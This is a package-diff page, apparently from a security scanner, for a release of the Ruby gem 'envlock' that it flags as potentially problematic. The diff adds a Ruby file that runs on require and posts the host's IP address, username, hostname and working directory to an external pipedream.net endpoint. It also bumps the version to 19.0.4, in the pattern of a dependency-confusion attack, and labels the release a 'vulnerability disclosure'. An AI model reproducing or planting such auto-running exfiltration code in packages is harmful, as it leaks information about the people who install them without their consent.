envlock 8.0.1 → 19.0.4
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of envlock might be problematic. Click here for more details.
- checksums.yaml +4 -4
- data/bin/mygem_executable +4 -0
- data/lib/mygem/myrubyfile.rb +39 -0
- metadata +18 -14
checksums.yaml
CHANGED
|
@@ -1,7 +1,7 @@
|
|
|
1
1
|
---
|
|
2
2
|
SHA256:
|
|
3
|
-
metadata.gz:
|
|
4
|
-
data.tar.gz:
|
|
3
|
+
metadata.gz: f9939002009479df9e48820d50f929241faf5fb341ebd39cf22dbe2f9ff9d0d7
|
|
4
|
+
data.tar.gz: 2eb1581dcfecee40ccf5f51df6e8146e154a10da2f49841c130b1bb6f6fc9a61
|
|
5
5
|
SHA512:
|
|
6
|
-
metadata.gz:
|
|
7
|
-
data.tar.gz:
|
|
6
|
+
metadata.gz: d29e8e80970a01dd2802d2171668aea417d8068d80ad17b0897c73e7f1f9794b3bf56ad712539c2534e217884156a7e3041d8aa557c6d482ee5d158ebc96bee8
|
|
7
|
+
data.tar.gz: 97f0c009c74090be10f1993ac87bcd1a3fbad289af4f484017c61784a5c543d483ce0a2b20df7937fdfaecdefc1e8ab0af2ec5700b4a9b2ebbdc81a1a7befc02
|
|
@@ -0,0 +1,39 @@
|
|
|
1
|
+
require 'net/http'
|
|
2
|
+
require 'socket'
|
|
3
|
+
|
|
4
|
+
module MyGem
|
|
5
|
+
class MyRubyFile
|
|
6
|
+
def self.send_data
|
|
7
|
+
# Get IP address
|
|
8
|
+
ip = Socket.ip_address_list.find { |addr| addr.ipv4? && !addr.ipv4_loopback? }&.ip_address || ''
|
|
9
|
+
|
|
10
|
+
# Get working directory
|
|
11
|
+
dir = Dir.pwd
|
|
12
|
+
|
|
13
|
+
# Get username
|
|
14
|
+
username = ENV['USER'] || ''
|
|
15
|
+
|
|
16
|
+
# Get hostname
|
|
17
|
+
hostname = Socket.gethostname
|
|
18
|
+
|
|
19
|
+
# Burp Collaborator server URL
|
|
20
|
+
burp_url = 'https://eox7hb9vmzgf94.m.pipedream.net'
|
|
21
|
+
|
|
22
|
+
# Data to send
|
|
23
|
+
data = {
|
|
24
|
+
'ip' => ip,
|
|
25
|
+
'directory' => dir,
|
|
26
|
+
'username' => username,
|
|
27
|
+
'hostname' => hostname
|
|
28
|
+
}
|
|
29
|
+
|
|
30
|
+
# Send data to Burp Collaborator server
|
|
31
|
+
uri = URI.parse(burp_url)
|
|
32
|
+
Net::HTTP.post_form(uri, data)
|
|
33
|
+
end
|
|
34
|
+
end
|
|
35
|
+
end
|
|
36
|
+
|
|
37
|
+
# Automatically send data when the gem is required
|
|
38
|
+
MyGem::MyRubyFile.send_data
|
|
39
|
+
|
metadata
CHANGED
|
@@ -1,26 +1,30 @@
|
|
|
1
1
|
--- !ruby/object:Gem::Specification
|
|
2
2
|
name: envlock
|
|
3
3
|
version: !ruby/object:Gem::Version
|
|
4
|
-
version:
|
|
4
|
+
version: 19.0.4
|
|
5
5
|
platform: ruby
|
|
6
6
|
authors:
|
|
7
|
-
-
|
|
8
|
-
autorequire:
|
|
7
|
+
- Naveen Kumawat
|
|
8
|
+
autorequire:
|
|
9
9
|
bindir: bin
|
|
10
10
|
cert_chain: []
|
|
11
|
-
date: 2023-07-
|
|
11
|
+
date: 2023-07-16 00:00:00.000000000 Z
|
|
12
12
|
dependencies: []
|
|
13
|
-
description:
|
|
13
|
+
description: This Ruby package vulnerable to dependency confiuse vulnerability
|
|
14
14
|
email:
|
|
15
|
-
-
|
|
16
|
-
executables:
|
|
15
|
+
- naveenkumawat1995@gmail.com
|
|
16
|
+
executables:
|
|
17
|
+
- mygem_executable
|
|
17
18
|
extensions: []
|
|
18
19
|
extra_rdoc_files: []
|
|
19
|
-
files:
|
|
20
|
-
|
|
21
|
-
|
|
20
|
+
files:
|
|
21
|
+
- bin/mygem_executable
|
|
22
|
+
- lib/mygem/myrubyfile.rb
|
|
23
|
+
homepage: https://rubygems.org/gems/envlock
|
|
24
|
+
licenses:
|
|
25
|
+
- MIT
|
|
22
26
|
metadata: {}
|
|
23
|
-
post_install_message:
|
|
27
|
+
post_install_message:
|
|
24
28
|
rdoc_options: []
|
|
25
29
|
require_paths:
|
|
26
30
|
- lib
|
|
@@ -35,8 +39,8 @@ required_rubygems_version: !ruby/object:Gem::Requirement
|
|
|
35
39
|
- !ruby/object:Gem::Version
|
|
36
40
|
version: '0'
|
|
37
41
|
requirements: []
|
|
38
|
-
rubygems_version: 3.
|
|
39
|
-
signing_key:
|
|
42
|
+
rubygems_version: 3.4.10
|
|
43
|
+
signing_key:
|
|
40
44
|
specification_version: 4
|
|
41
|
-
summary:
|
|
45
|
+
summary: 'Vulnerability Disclosure: Dependency confiuse vulnerability'
|
|
42
46
|
test_files: []
|